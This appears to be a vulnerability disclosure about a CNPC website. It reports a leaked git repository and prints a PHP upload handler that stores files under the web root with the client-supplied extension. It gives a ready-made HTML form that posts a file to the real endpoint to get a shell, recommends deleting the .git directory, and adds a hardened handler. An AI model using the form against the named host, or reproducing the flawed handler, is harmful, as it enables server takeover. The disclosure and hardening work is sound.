Reconstruction of the source code of a station of CNPC to GetShell
1.85.51.141 git source code Leakage
Corresponding Domain Name
http://mtp.cnpc.com.cn
Audit code
/resources/data/appstore/appOperate.php
Starting at line 31:
if ($act == 'uploadfile') {
    if (!is_dir("../../files/appfiles")) { // if the folder does not exist
        mkdir("../../files/appfiles", 0777); // create a folder
        chmod("../../files/appfiles", 0777); // change file mode
    }
    // upload the app file appFileName
    $appname = $_FILES['appfilename']['name'];
    $mktime = time();
    // create a folder
    $mkfile = '../../files/appfiles/' . $mktime . '/';
    mkdir($mkfile, 0777);
    // $optionDir = '/mdm/www/resources/files/appfiles/' . $mktime;
    // exec('chmod 0777 ' . $optionDir);
    // the stored name keeps the extension of the client-supplied name, unchecked
    $rand = $mktime . substr($appname, strrpos($appname, "."));
    $destination = $mkfile . $rand;
    $_SESSION['filepath'] = $mktime;
    $_SESSION['filename'] = $rand;
    if (move_uploaded_file($_FILES['appfilename']['tmp_name'], $destination)) {
        $arr = array('success' => true, 'filename' => $rand, 'localname' => $appname);
    } else {
        $arr = array('success' => false, 'reason' => $destination);
    }
    echo json_encode($arr);
}
Arbitrary File Upload
Form
<form method="post" action="http://mtp.cnpc.com.cn/resources/data/appstore/appOperate.php" enctype="multipart/form-data">
    <input name="appFileName" type="file" />
    <input name="action" type="text" value="uploadFile"/>
    <input name="submit" type="submit" />
</form>
Solution:
Delete the .git directory
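Removing the git directory closes the source leak, but the handler audited above still keeps the client-supplied extension and writes under the web root. A hardened version of that handler follows as an added example, not the application's own code; the extension allowlist, storage path, size limit and the `user_id` session key are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not the application's code. All constants are assumed values.
const ALLOWED_EXT = ['apk', 'ipa'];           // assumed app package types
const UPLOAD_ROOT = '/var/lib/mdm/appfiles';  // assumed path outside the web root
const MAX_BYTES   = 200 * 1024 * 1024;        // assumed size limit

/** Return a server-generated stored name, or throw if the upload must be rejected. */
function safe_stored_name(string $clientName, int $size, int $error): string
{
    if ($error !== UPLOAD_ERR_OK || $size <= 0 || $size > MAX_BYTES) {
        throw new RuntimeException('upload failed or size out of range');
    }
    // Only the final extension is read from the client name, and only to
    // compare against the allowlist; the name itself never becomes a path.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new RuntimeException('file type not allowed');
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

function handle_upload(array $file, array $session): array
{
    if (empty($session['user_id'])) {         // hypothetical login marker
        return ['success' => false, 'reason' => 'not authenticated'];
    }
    try {
        $name = safe_stored_name((string)$file['name'], (int)$file['size'], (int)$file['error']);
    } catch (RuntimeException $e) {
        return ['success' => false, 'reason' => $e->getMessage()];
    }
    if (!is_dir(UPLOAD_ROOT) && !mkdir(UPLOAD_ROOT, 0750, true)) {
        return ['success' => false, 'reason' => 'storage unavailable'];
    }
    $dest = UPLOAD_ROOT . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        // Unlike the original, the failure response does not echo the server path.
        return ['success' => false, 'reason' => 'store failed'];
    }
    chmod($dest, 0640);                       // not world-writable, not executable
    return ['success' => true, 'filename' => $name, 'localname' => basename($file['name'])];
}
// Caller: echo json_encode(handle_upload($_FILES['appFileName'], $_SESSION));
```

Because files land outside the document root, downloads have to be served by a script that reads them, so nothing uploaded can be requested and executed directly.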